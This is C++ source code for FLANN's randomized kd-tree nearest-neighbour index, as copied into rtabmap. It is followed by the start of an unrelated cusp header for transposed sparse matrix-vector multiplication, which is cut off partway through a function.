* Copyright 2008-2009 Marius Muja (mariusm@cs.ubc.ca). All rights reserved.
* Copyright 2008-2009 David G. Lowe (lowe@cs.ubc.ca). All rights reserved.
*
* THE BSD LICENSE
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*************************************************************************/
#ifndef RTABMAP_FLANN_KDTREE_INDEX_H_
#define RTABMAP_FLANN_KDTREE_INDEX_H_
#include <algorithm>
#include <map>
#include <cassert>
#include <cstring>
#include <stdarg.h>
#include <cmath>
#include "rtflann/general.h"
#include "rtflann/algorithms/nn_index.h"
#include "rtflann/util/dynamic_bitset.h"
#include "rtflann/util/matrix.h"
#include "rtflann/util/result_set.h"
#include "rtflann/util/heap.h"
#include "rtflann/util/allocator.h"
#include "rtflann/util/random.h"
#include "rtflann/util/saving.h"
namespace rtflann
{
struct KDTreeIndexParams : public IndexParams
{
KDTreeIndexParams(int trees = 4)
{
(*this)["algorithm"] = FLANN_INDEX_KDTREE;
(*this)["trees"] = trees;
}
};
/**
* Randomized kd-tree index
*
* Contains the k-d trees and other information for indexing a set of points
* for nearest-neighbor matching.
*/
template <typename Distance>
class KDTreeIndex : public NNIndex<Distance>
{
public:
typedef typename Distance::ElementType ElementType;
typedef typename Distance::ResultType DistanceType;
typedef NNIndex<Distance> BaseClass;
typedef bool needs_kdtree_distance;
private:
/*--------------------- Internal Data Structures --------------------------*/
struct Node
{
/**
* Dimension used for subdivision.
*/
int divfeat;
/**
* The values used for subdivision.
*/
DistanceType divval;
/**
* Point data
*/
ElementType* point;
/**
* The child nodes.
*/
Node* child1, *child2;
Node(){
child1 = NULL;
child2 = NULL;
}
~Node() {
if (child1 != NULL) { child1->~Node(); child1 = NULL; }
if (child2 != NULL) { child2->~Node(); child2 = NULL; }
}
private:
template<typename Archive>
void serialize(Archive& ar)
{
typedef KDTreeIndex<Distance> Index;
Index* obj = static_cast<Index*>(ar.getObject());
ar & divfeat;
ar & divval;
bool leaf_node = false;
if (Archive::is_saving::value) {
leaf_node = ((child1==NULL) && (child2==NULL));
}
ar & leaf_node;
if (leaf_node) {
if (Archive::is_loading::value) {
point = obj->points_[divfeat];
}
}
if (!leaf_node) {
if (Archive::is_loading::value) {
child1 = new(obj->pool_) Node();
child2 = new(obj->pool_) Node();
}
ar & *child1;
ar & *child2;
}
}
friend struct serialization::access;
};
typedef Node* NodePtr;
typedef BranchStruct<NodePtr, DistanceType> BranchSt;
typedef BranchSt* Branch;
public:
/**
* KDTree constructor
*
* Params:
* inputData = dataset with the input features
* params = parameters passed to the kdtree algorithm
*/
KDTreeIndex(const IndexParams& params = KDTreeIndexParams(), Distance d = Distance() ) :
BaseClass(params, d), mean_(NULL), var_(NULL)
{
trees_ = get_param(index_params_,"trees",4);
}
/**
* KDTree constructor
*
* Params:
* inputData = dataset with the input features
* params = parameters passed to the kdtree algorithm
*/
KDTreeIndex(const Matrix<ElementType>& dataset, const IndexParams& params = KDTreeIndexParams(),
Distance d = Distance() ) : BaseClass(params,d ), mean_(NULL), var_(NULL)
{
trees_ = get_param(index_params_,"trees",4);
setDataset(dataset);
}
KDTreeIndex(const KDTreeIndex& other) : BaseClass(other),
trees_(other.trees_)
{
tree_roots_.resize(other.tree_roots_.size());
for (size_t i=0;i<tree_roots_.size();++i) {
copyTree(tree_roots_[i], other.tree_roots_[i]);
}
}
KDTreeIndex& operator=(KDTreeIndex other)
{
this->swap(other);
return *this;
}
/**
* Standard destructor
*/
virtual ~KDTreeIndex()
{
freeIndex();
}
BaseClass* clone() const
{
return new KDTreeIndex(*this);
}
using BaseClass::buildIndex;
void addPoints(const Matrix<ElementType>& points, float rebuild_threshold = 2)
{
assert(points.cols==veclen_);
size_t old_size = size_;
extendDataset(points);
if (rebuild_threshold>1 && size_at_build_*rebuild_threshold<size_) {
buildIndex();
}
else {
for (size_t i=old_size;i<size_;++i) {
for (int j = 0; j < trees_; j++) {
addPointToTree(tree_roots_[j], i);
}
}
}
}
flann_algorithm_t getType() const
{
return FLANN_INDEX_KDTREE;
}
template<typename Archive>
void serialize(Archive& ar)
{
ar.setObject(this);
ar & *static_cast<NNIndex<Distance>*>(this);
ar & trees_;
if (Archive::is_loading::value) {
tree_roots_.resize(trees_);
}
for (size_t i=0;i<tree_roots_.size();++i) {
if (Archive::is_loading::value) {
tree_roots_[i] = new(pool_) Node();
}
ar & *tree_roots_[i];
}
if (Archive::is_loading::value) {
index_params_["algorithm"] = getType();
index_params_["trees"] = trees_;
}
}
void saveIndex(FILE* stream)
{
serialization::SaveArchive sa(stream);
sa & *this;
}
void loadIndex(FILE* stream)
{
freeIndex();
serialization::LoadArchive la(stream);
la & *this;
}
/**
* Computes the inde memory usage
* Returns: memory used by the index
*/
int usedMemory() const
{
return int(pool_.usedMemory+pool_.wastedMemory+size_*sizeof(int)); // pool memory and vind array memory
}
/**
* Find set of nearest neighbors to vec. Their indices are stored inside
* the result object.
*
* Params:
* result = the result object in which the indices of the nearest-neighbors are stored
* vec = the vector for which to search the nearest neighbors
* maxCheck = the maximum number of restarts (in a best-bin-first manner)
*/
void findNeighbors(ResultSet<DistanceType>& result, const ElementType* vec, const SearchParams& searchParams) const
{
int maxChecks = searchParams.checks;
float epsError = 1+searchParams.eps;
if (maxChecks==FLANN_CHECKS_UNLIMITED) {
if (removed_) {
getExactNeighbors<true>(result, vec, epsError);
}
else {
getExactNeighbors<false>(result, vec, epsError);
}
}
else {
if (removed_) {
getNeighbors<true>(result, vec, maxChecks, epsError);
}
else {
getNeighbors<false>(result, vec, maxChecks, epsError);
}
}
}
#ifdef FLANN_KDTREE_MEM_OPT
/**
* Find set of nearest neighbors to vec. Their indices are stored inside
* the result object.
*
* Params:
* result = the result object in which the indices of the nearest-neighbors are stored
* vec = the vector for which to search the nearest neighbors
* maxCheck = the maximum number of restarts (in a best-bin-first manner)
*/
void findNeighbors(ResultSet<DistanceType>& result, const ElementType* vec, const SearchParams& searchParams, Heap<BranchSt>* heap) const
{
int maxChecks = searchParams.checks;
float epsError = 1+searchParams.eps;
if (maxChecks==FLANN_CHECKS_UNLIMITED) {
if (removed_) {
getExactNeighbors<true>(result, vec, epsError);
}
else {
getExactNeighbors<false>(result, vec, epsError);
}
}
else {
if (removed_) {
getNeighbors<true>(result, vec, maxChecks, epsError, heap);
}
else {
getNeighbors<false>(result, vec, maxChecks, epsError, heap);
}
}
}
/**
* @brief Perform k-nearest neighbor search
* @param[in] queries The query points for which to find the nearest neighbors
* @param[out] indices The indices of the nearest neighbors found
* @param[out] dists Distances to the nearest neighbors found
* @param[in] knn Number of nearest neighbors to return
* @param[in] params Search parameters
*/
virtual int knnSearch(const Matrix<ElementType>& queries,
Matrix<size_t>& indices,
Matrix<DistanceType>& dists,
size_t knn,
const SearchParams& params) const
{
assert(queries.cols == veclen_);
assert(indices.rows >= queries.rows);
assert(dists.rows >= queries.rows);
assert(indices.cols >= knn);
assert(dists.cols >= knn);
bool use_heap;
if (params.use_heap==FLANN_Undefined) {
use_heap = (knn>KNN_HEAP_THRESHOLD)?true:false;
}
else {
use_heap = (params.use_heap==FLANN_True)?true:false;
}
int count = 0;
Heap<BranchSt>* heap = new Heap<BranchSt>((int)size_);
if (use_heap) {
//#pragma omp parallel num_threads(params.cores)
{
KNNResultSet2<DistanceType> resultSet(knn);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = std::min(resultSet.size(), knn);
resultSet.copy(indices[i], dists[i], n, params.sorted);
indices_to_ids(indices[i], indices[i], n);
count += n;
}
}
}
else {
std::vector<double> times(queries.rows);
//#pragma omp parallel num_threads(params.cores)
{
KNNSimpleResultSet<DistanceType> resultSet(knn);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = std::min(resultSet.size(), knn);
resultSet.copy(indices[i], dists[i], n, params.sorted);
indices_to_ids(indices[i], indices[i], n);
count += n;
}
}
std::sort(times.begin(), times.end());
}
delete heap;
return count;
}
/**
* @brief Perform k-nearest neighbor search
* @param[in] queries The query points for which to find the nearest neighbors
* @param[out] indices The indices of the nearest neighbors found
* @param[out] dists Distances to the nearest neighbors found
* @param[in] knn Number of nearest neighbors to return
* @param[in] params Search parameters
*/
virtual int knnSearch(const Matrix<ElementType>& queries,
std::vector< std::vector<size_t> >& indices,
std::vector<std::vector<DistanceType> >& dists,
size_t knn,
const SearchParams& params) const
{
assert(queries.cols == veclen_);
bool use_heap;
if (params.use_heap==FLANN_Undefined) {
use_heap = (knn>KNN_HEAP_THRESHOLD)?true:false;
}
else {
use_heap = (params.use_heap==FLANN_True)?true:false;
}
if (indices.size() < queries.rows ) indices.resize(queries.rows);
if (dists.size() < queries.rows ) dists.resize(queries.rows);
Heap<BranchSt>* heap = new Heap<BranchSt>((int)size_);
int count = 0;
if (use_heap) {
//#pragma omp parallel num_threads(params.cores)
{
KNNResultSet2<DistanceType> resultSet(knn);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = std::min(resultSet.size(), knn);
indices[i].resize(n);
dists[i].resize(n);
if (n>0) {
resultSet.copy(&indices[i][0], &dists[i][0], n, params.sorted);
indices_to_ids(&indices[i][0], &indices[i][0], n);
}
count += n;
}
}
}
else {
//#pragma omp parallel num_threads(params.cores)
{
KNNSimpleResultSet<DistanceType> resultSet(knn);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = std::min(resultSet.size(), knn);
indices[i].resize(n);
dists[i].resize(n);
if (n>0) {
resultSet.copy(&indices[i][0], &dists[i][0], n, params.sorted);
indices_to_ids(&indices[i][0], &indices[i][0], n);
}
count += n;
}
}
}
delete heap;
return count;
}
/**
* @brief Perform radius search
* @param[in] query The query point
* @param[out] indices The indices of the neighbors found within the given radius
* @param[out] dists The distances to the nearest neighbors found
* @param[in] radius The radius used for search
* @param[in] params Search parameters
* @return Number of neighbors found
*/
virtual int radiusSearch(const Matrix<ElementType>& queries,
Matrix<size_t>& indices,
Matrix<DistanceType>& dists,
float radius,
const SearchParams& params) const
{
assert(queries.cols == veclen);
int count = 0;
size_t num_neighbors = std::min(indices.cols, dists.cols);
int max_neighbors = params.max_neighbors;
if (max_neighbors<0) max_neighbors = num_neighbors;
else max_neighbors = std::min(max_neighbors,(int)num_neighbors);
Heap<BranchSt>* heap = new Heap<BranchSt>((int)size_);
if (max_neighbors==0) {
//#pragma omp parallel num_threads(params.cores)
{
CountRadiusResultSet<DistanceType> resultSet(radius);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
count += resultSet.size();
}
}
}
else {
// explicitly indicated to use unbounded radius result set
// and we know there'll be enough room for resulting indices and dists
if (params.max_neighbors<0 && (num_neighbors>=this->size())) {
//#pragma omp parallel num_threads(params.cores)
{
RadiusResultSet<DistanceType> resultSet(radius);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = resultSet.size();
count += n;
if (n>num_neighbors) n = num_neighbors;
resultSet.copy(indices[i], dists[i], n, params.sorted);
// mark the next element in the output buffers as unused
if (n<indices.cols) indices[i][n] = size_t(-1);
if (n<dists.cols) dists[i][n] = std::numeric_limits<DistanceType>::infinity();
indices_to_ids(indices[i], indices[i], n);
}
}
}
else {
// number of neighbors limited to max_neighbors
//#pragma omp parallel num_threads(params.cores)
{
KNNRadiusResultSet<DistanceType> resultSet(radius, max_neighbors);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = resultSet.size();
count += n;
if ((int)n>max_neighbors) n = max_neighbors;
resultSet.copy(indices[i], dists[i], n, params.sorted);
// mark the next element in the output buffers as unused
if (n<indices.cols) indices[i][n] = size_t(-1);
if (n<dists.cols) dists[i][n] = std::numeric_limits<DistanceType>::infinity();
indices_to_ids(indices[i], indices[i], n);
}
}
}
}
delete heap;
return count;
}
/**
* @brief Perform radius search
* @param[in] query The query point
* @param[out] indices The indices of the neighbors found within the given radius
* @param[out] dists The distances to the nearest neighbors found
* @param[in] radius The radius used for search
* @param[in] params Search parameters
* @return Number of neighbors found
*/
virtual int radiusSearch(const Matrix<ElementType>& queries,
std::vector< std::vector<size_t> >& indices,
std::vector<std::vector<DistanceType> >& dists,
float radius,
const SearchParams& params) const
{
assert(queries.cols == veclen_);
int count = 0;
Heap<BranchSt>* heap = new Heap<BranchSt>((int)size_);
// just count neighbors
if (params.max_neighbors==0) {
//#pragma omp parallel num_threads(params.cores)
{
CountRadiusResultSet<DistanceType> resultSet(radius);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
count += resultSet.size();
}
}
}
else {
if (indices.size() < queries.rows ) indices.resize(queries.rows);
if (dists.size() < queries.rows ) dists.resize(queries.rows);
if (params.max_neighbors<0) {
// search for all neighbors
//#pragma omp parallel num_threads(params.cores)
{
RadiusResultSet<DistanceType> resultSet(radius);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = resultSet.size();
count += n;
indices[i].resize(n);
dists[i].resize(n);
if (n > 0) {
resultSet.copy(&indices[i][0], &dists[i][0], n, params.sorted);
indices_to_ids(&indices[i][0], &indices[i][0], n);
}
}
}
}
else {
// number of neighbors limited to max_neighbors
//#pragma omp parallel num_threads(params.cores)
{
KNNRadiusResultSet<DistanceType> resultSet(radius, params.max_neighbors);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = resultSet.size();
count += n;
if ((int)n>params.max_neighbors) n = params.max_neighbors;
indices[i].resize(n);
dists[i].resize(n);
if (n > 0) {
resultSet.copy(&indices[i][0], &dists[i][0], n, params.sorted);
indices_to_ids(&indices[i][0], &indices[i][0], n);
}
}
}
}
}
delete heap;
return count;
}
#endif
protected:
/**
* Builds the index
*/
void buildIndexImpl()
{
// Create a permutable array of indices to the input vectors.
std::vector<int> ind(size_);
for (size_t i = 0; i < size_; ++i) {
ind[i] = int(i);
}
mean_ = new DistanceType[veclen_];
var_ = new DistanceType[veclen_];
tree_roots_.resize(trees_);
/* Construct the randomized trees. */
for (int i = 0; i < trees_; i++) {
/* Randomize the order of vectors to allow for unbiased sampling. */
std::random_shuffle(ind.begin(), ind.end());
tree_roots_[i] = divideTree(&ind[0], int(size_) );
}
delete[] mean_;
delete[] var_;
}
void freeIndex()
{
for (size_t i=0;i<tree_roots_.size();++i) {
// using placement new, so call destructor explicitly
if (tree_roots_[i]!=NULL) tree_roots_[i]->~Node();
}
pool_.free();
}
private:
void copyTree(NodePtr& dst, const NodePtr& src)
{
dst = new(pool_) Node();
dst->divfeat = src->divfeat;
dst->divval = src->divval;
if (src->child1==NULL && src->child2==NULL) {
dst->point = points_[dst->divfeat];
dst->child1 = NULL;
dst->child2 = NULL;
}
else {
copyTree(dst->child1, src->child1);
copyTree(dst->child2, src->child2);
}
}
/**
* Create a tree node that subdivides the list of vecs from vind[first]
* to vind[last]. The routine is called recursively on each sublist.
* Place a pointer to this new tree node in the location pTree.
*
* Params: pTree = the new node to create
* first = index of the first vector
* last = index of the last vector
*/
NodePtr divideTree(int* ind, int count)
{
NodePtr node = new(pool_) Node(); // allocate memory
/* If too few exemplars remain, then make this a leaf node. */
if (count == 1) {
node->child1 = node->child2 = NULL; /* Mark as leaf node. */
node->divfeat = *ind; /* Store index of this vec. */
node->point = points_[*ind];
}
else {
int idx;
int cutfeat;
DistanceType cutval;
meanSplit(ind, count, idx, cutfeat, cutval);
node->divfeat = cutfeat;
node->divval = cutval;
node->child1 = divideTree(ind, idx);
node->child2 = divideTree(ind+idx, count-idx);
}
return node;
}
/**
* Choose which feature to use in order to subdivide this set of vectors.
* Make a random choice among those with the highest variance, and use
* its variance as the threshold value.
*/
void meanSplit(int* ind, int count, int& index, int& cutfeat, DistanceType& cutval)
{
memset(mean_,0,veclen_*sizeof(DistanceType));
memset(var_,0,veclen_*sizeof(DistanceType));
/* Compute mean values. Only the first SAMPLE_MEAN values need to be
sampled to get a good estimate.
*/
int cnt = std::min((int)SAMPLE_MEAN+1, count);
for (int j = 0; j < cnt; ++j) {
ElementType* v = points_[ind[j]];
for (size_t k=0; k<veclen_; ++k) {
mean_[k] += v[k];
}
}
DistanceType div_factor = DistanceType(1)/cnt;
for (size_t k=0; k<veclen_; ++k) {
mean_[k] *= div_factor;
}
/* Compute variances (no need to divide by count). */
for (int j = 0; j < cnt; ++j) {
ElementType* v = points_[ind[j]];
for (size_t k=0; k<veclen_; ++k) {
DistanceType dist = v[k] - mean_[k];
var_[k] += dist * dist;
}
}
/* Select one of the highest variance indices at random. */
cutfeat = selectDivision(var_);
cutval = mean_[cutfeat];
int lim1, lim2;
planeSplit(ind, count, cutfeat, cutval, lim1, lim2);
if (lim1>count/2) index = lim1;
else if (lim2<count/2) index = lim2;
else index = count/2;
/* If either list is empty, it means that all remaining features
* are identical. Split in the middle to maintain a balanced tree.
*/
if ((lim1==count)||(lim2==0)) index = count/2;
}
/**
* Select the top RAND_DIM largest values from v and return the index of
* one of these selected at random.
*/
int selectDivision(DistanceType* v)
{
int num = 0;
size_t topind[RAND_DIM];
/* Create a list of the indices of the top RAND_DIM values. */
for (size_t i = 0; i < veclen_; ++i) {
if ((num < RAND_DIM)||(v[i] > v[topind[num-1]])) {
/* Put this element at end of topind. */
if (num < RAND_DIM) {
topind[num++] = i; /* Add to list. */
}
else {
topind[num-1] = i; /* Replace last element. */
}
/* Bubble end value down to right location by repeated swapping. */
int j = num - 1;
while (j > 0 && v[topind[j]] > v[topind[j-1]]) {
std::swap(topind[j], topind[j-1]);
--j;
}
}
}
/* Select a random integer in range [0,num-1], and return that index. */
int rnd = rand_int(num);
return (int)topind[rnd];
}
/**
* Subdivide the list of points by a plane perpendicular on axe corresponding
* to the 'cutfeat' dimension at 'cutval' position.
*
* On return:
* dataset[ind[0..lim1-1]][cutfeat]<cutval
* dataset[ind[lim1..lim2-1]][cutfeat]==cutval
* dataset[ind[lim2..count]][cutfeat]>cutval
*/
void planeSplit(int* ind, int count, int cutfeat, DistanceType cutval, int& lim1, int& lim2)
{
/* Move vector indices for left subtree to front of list. */
int left = 0;
int right = count-1;
for (;; ) {
while (left<=right && points_[ind[left]][cutfeat]<cutval) ++left;
while (left<=right && points_[ind[right]][cutfeat]>=cutval) --right;
if (left>right) break;
std::swap(ind[left], ind[right]); ++left; --right;
}
lim1 = left;
right = count-1;
for (;; ) {
while (left<=right && points_[ind[left]][cutfeat]<=cutval) ++left;
while (left<=right && points_[ind[right]][cutfeat]>cutval) --right;
if (left>right) break;
std::swap(ind[left], ind[right]); ++left; --right;
}
lim2 = left;
}
/**
* Performs an exact nearest neighbor search. The exact search performs a full
* traversal of the tree.
*/
template<bool with_removed>
void getExactNeighbors(ResultSet<DistanceType>& result, const ElementType* vec, float epsError) const
{
// checkID -= 1; /* Set a different unique ID for each search. */
if (trees_ > 1) {
fprintf(stderr,"It doesn't make any sense to use more than one tree for exact search");
}
if (trees_>0) {
searchLevelExact<with_removed>(result, vec, tree_roots_[0], 0.0, epsError);
}
}
/**
* Performs the approximate nearest-neighbor search. The search is approximate
* because the tree traversal is abandoned after a given number of descends in
* the tree.
*/
template<bool with_removed>
void getNeighbors(ResultSet<DistanceType>& result, const ElementType* vec, int maxCheck, float epsError) const
{
int i;
BranchSt branch;
int checkCount = 0;
Heap<BranchSt>* heap = new Heap<BranchSt>((int)size_);
DynamicBitset checked(size_);
/* Search once through each tree down to root. */
for (i = 0; i < trees_; ++i) {
searchLevel<with_removed>(result, vec, tree_roots_[i], 0, checkCount, maxCheck, epsError, heap, checked);
}
/* Keep searching other branches from heap until finished. */
while ( heap->popMin(branch) && (checkCount < maxCheck || !result.full() )) {
searchLevel<with_removed>(result, vec, branch.node, branch.mindist, checkCount, maxCheck, epsError, heap, checked);
}
delete heap;
}
#ifdef FLANN_KDTREE_MEM_OPT
/**
* Performs the approximate nearest-neighbor search. The search is approximate
* because the tree traversal is abandoned after a given number of descends in
* the tree.
*/
template<bool with_removed>
void getNeighbors(ResultSet<DistanceType>& result, const ElementType* vec, int maxCheck, float epsError, Heap<BranchSt>* heap) const
{
int i;
BranchSt branch;
int checkCount = 0;
DynamicBitset checked(size_);
heap->clear();
/* Search once through each tree down to root. */
for (i = 0; i < trees_; ++i) {
searchLevel<with_removed>(result, vec, tree_roots_[i], 0, checkCount, maxCheck, epsError, heap, checked);
}
/* Keep searching other branches from heap until finished. */
while ( heap->popMin(branch) && (checkCount < maxCheck || !result.full() )) {
searchLevel<with_removed>(result, vec, branch.node, branch.mindist, checkCount, maxCheck, epsError, heap, checked);
}
}
#endif
/**
* Search starting from a given node of the tree. Based on any mismatches at
* higher levels, all exemplars below this level must have a distance of
* at least "mindistsq".
*/
template<bool with_removed>
void searchLevel(ResultSet<DistanceType>& result_set, const ElementType* vec, NodePtr node, DistanceType mindist, int& checkCount, int maxCheck,
float epsError, Heap<BranchSt>* heap, DynamicBitset& checked) const
{
if (result_set.worstDist()<mindist) {
// printf("Ignoring branch, too far\n");
return;
}
/* If this is a leaf node, then do check and return. */
if ((node->child1 == NULL)&&(node->child2 == NULL)) {
int index = node->divfeat;
if (with_removed) {
if (removed_points_.test(index)) return;
}
/* Do not check same node more than once when searching multiple trees. */
if ( checked.test(index) || ((checkCount>=maxCheck)&& result_set.full()) ) return;
checked.set(index);
checkCount++;
DistanceType dist = distance_(node->point, vec, veclen_);
result_set.addPoint(dist,index);
return;
}
/* Which child branch should be taken first? */
ElementType val = vec[node->divfeat];
DistanceType diff = val - node->divval;
NodePtr bestChild = (diff < 0) ? node->child1 : node->child2;
NodePtr otherChild = (diff < 0) ? node->child2 : node->child1;
/* Create a branch record for the branch not taken. Add distance
of this feature boundary (we don't attempt to correct for any
use of this feature in a parent node, which is unlikely to
happen and would have only a small effect). Don't bother
adding more branches to heap after halfway point, as cost of
adding exceeds their value.
*/
DistanceType new_distsq = mindist + distance_.accum_dist(val, node->divval, node->divfeat);
// if (2 * checkCount < maxCheck || !result.full()) {
if ((new_distsq*epsError < result_set.worstDist())|| !result_set.full()) {
heap->insert( BranchSt(otherChild, new_distsq) );
}
/* Call recursively to search next level down. */
searchLevel<with_removed>(result_set, vec, bestChild, mindist, checkCount, maxCheck, epsError, heap, checked);
}
/**
* Performs an exact search in the tree starting from a node.
*/
template<bool with_removed>
void searchLevelExact(ResultSet<DistanceType>& result_set, const ElementType* vec, const NodePtr node, DistanceType mindist, const float epsError) const
{
/* If this is a leaf node, then do check and return. */
if ((node->child1 == NULL)&&(node->child2 == NULL)) {
int index = node->divfeat;
if (with_removed) {
if (removed_points_.test(index)) return; // ignore removed points
}
DistanceType dist = distance_(node->point, vec, veclen_);
result_set.addPoint(dist,index);
return;
}
/* Which child branch should be taken first? */
ElementType val = vec[node->divfeat];
DistanceType diff = val - node->divval;
NodePtr bestChild = (diff < 0) ? node->child1 : node->child2;
NodePtr otherChild = (diff < 0) ? node->child2 : node->child1;
/* Create a branch record for the branch not taken. Add distance
of this feature boundary (we don't attempt to correct for any
use of this feature in a parent node, which is unlikely to
happen and would have only a small effect). Don't bother
adding more branches to heap after halfway point, as cost of
adding exceeds their value.
*/
DistanceType new_distsq = mindist + distance_.accum_dist(val, node->divval, node->divfeat);
/* Call recursively to search next level down. */
searchLevelExact<with_removed>(result_set, vec, bestChild, mindist, epsError);
if (mindist*epsError<=result_set.worstDist()) {
searchLevelExact<with_removed>(result_set, vec, otherChild, new_distsq, epsError);
}
}
void addPointToTree(NodePtr node, int ind)
{
ElementType* point = points_[ind];
if ((node->child1==NULL) && (node->child2==NULL)) {
ElementType* leaf_point = node->point;
ElementType max_span = 0;
size_t div_feat = 0;
for (size_t i=0;i<veclen_;++i) {
ElementType span = std::abs(point[i]-leaf_point[i]);
if (span > max_span) {
max_span = span;
div_feat = i;
}
}
NodePtr left = new(pool_) Node();
left->child1 = left->child2 = NULL;
NodePtr right = new(pool_) Node();
right->child1 = right->child2 = NULL;
if (point[div_feat]<leaf_point[div_feat]) {
left->divfeat = ind;
left->point = point;
right->divfeat = node->divfeat;
right->point = node->point;
}
else {
left->divfeat = node->divfeat;
left->point = node->point;
right->divfeat = ind;
right->point = point;
}
node->divfeat = div_feat;
node->divval = (point[div_feat]+leaf_point[div_feat])/2;
node->child1 = left;
node->child2 = right;
}
else {
if (point[node->divfeat]<node->divval) {
addPointToTree(node->child1,ind);
}
else {
addPointToTree(node->child2,ind);
}
}
}
private:
void swap(KDTreeIndex& other)
{
BaseClass::swap(other);
std::swap(trees_, other.trees_);
std::swap(tree_roots_, other.tree_roots_);
std::swap(pool_, other.pool_);
}
private:
enum
{
/**
* To improve efficiency, only SAMPLE_MEAN random values are used to
* compute the mean and variance at each level when building a tree.
* A value of 100 seems to perform as well as using all values.
*/
SAMPLE_MEAN = 100,
/**
* Top random dimensions to consider
*
* When creating random trees, the dimension on which to subdivide is
* selected at random from among the top RAND_DIM dimensions with the
* highest variance. A value of 5 works well.
*/
RAND_DIM=5
};
/**
* Number of randomized trees that are used
*/
int trees_;
DistanceType* mean_;
DistanceType* var_;
/**
* Array of k-d trees used to find neighbours.
*/
std::vector<NodePtr> tree_roots_;
/**
* Pooled memory allocator.
*
* Using a pooled memory allocator is more efficient
* than allocating memory directly when there is a large
* number small of memory allocations.
*/
PooledAllocator pool_;
USING_BASECLASS_SYMBOLS
}; // class KDTreeIndex
}
#endif //FLANN_KDTREE_INDEX_H_
|
transposed_spmv.h | /*
* Copyright 2014-2015 The University of Queensland
* http://www.uq.edu.au
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#pragma once
#include <thrust/functional.h>
#include <cusp/detail/functional.h>
#ifndef DIA_CHUNKSIZE
#define DIA_CHUNKSIZE 1024
#endif
namespace cusp
{
namespace detail
{
namespace host
{
/////////////////////////
// DIA transposed SpMV //
/////////////////////////
template <typename Matrix,
typename Vector1,
typename Vector2,
typename UnaryFunction,
typename BinaryFunction1,
typename BinaryFunction2>
void transposed_spmv_dia(const Matrix& A,
const Vector1& x,
Vector2& y,
UnaryFunction initialize,
BinaryFunction1 combine,
BinaryFunction2 reduce)
{
typedef typename Matrix::index_type IndexType;
//typedef typename Vector2::value_type ValueType;
const size_t num_diagonals = A.values.num_cols;
#pragma omp parallel for
for (size_t ch = 0; ch < A.num_cols; ch += DIA_CHUNKSIZE) {
// initialize chunk
for (size_t row = ch; row < std::min(ch+DIA_CHUNKSIZE,A.num_cols); row++)
{
y[row] = initialize(y[row]);
}
// for each diagonal
for (size_t d = 0; d < num_diagonals; d++)
{
for (IndexType row=ch; row<std::min(ch+DIA_CHUNKSIZE,A.num_cols); row++)
{
const IndexType col = row - A.diagonal_offsets[d];
if (col >= 0 && col < A.num_rows)
{
y[row] = reduce(y[row], combine(A.values(col, d), x[col]));
}
}
}
}
}
template <typename Matrix,
typename Vector1,
typename Vector2>
void transposed_spmv_dia(const Matrix& A,
const Vector1& x,
Vector2& y)
{
typedef typename Vector2::value_type ValueType;
transposed_spmv_dia(A, x, y,
cusp::detail::zero_function<ValueType>(),
thrust::multiplies<ValueType>(),
thrust::plus<ValueType>());
}
template <typename Matrix,
typename Vector1,
typename Vector2,
typename UnaryFunction,
typename BinaryFunction1,
typename BinaryFunction2>
void transposed_spmv_cds(const Matrix& A,
const Vector1& x,
Vector2& y,
UnaryFunction initialize,
BinaryFunction1 combine,
BinaryFunction2 reduce)
{
